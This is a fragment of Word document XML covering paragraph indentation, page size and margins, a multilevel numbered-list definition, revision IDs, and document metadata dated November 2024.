        <w:ind w:left="53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B2F541" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="537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407B4">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="612" w:right="492" w:bottom="331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A6EED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9364EDC8"/>
    <w:lvl w:ilvl="0" w:tplc="D7B60E5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.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A65EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2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0F34A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3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ED58C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4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A7F2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5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A8ECA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6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042BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7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AE3EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8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A85E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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35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B4"/>
    <w:rsid w:val="003407B4"/>
    <w:rsid w:val="00430AC0"/>
    <w:rsid w:val="00993EAB"/>
    <w:rsid w:val="00B07174"/>
    <w:rsid w:val="00E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A72"/>
  <w15:docId w15:val="{77E40688-BD41-4AE6-9C08-70D6368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/>
      <w:ind w:left="54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4</cp:revision>
  <cp:lastPrinted>2024-11-19T21:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-19T21:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-19T22:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>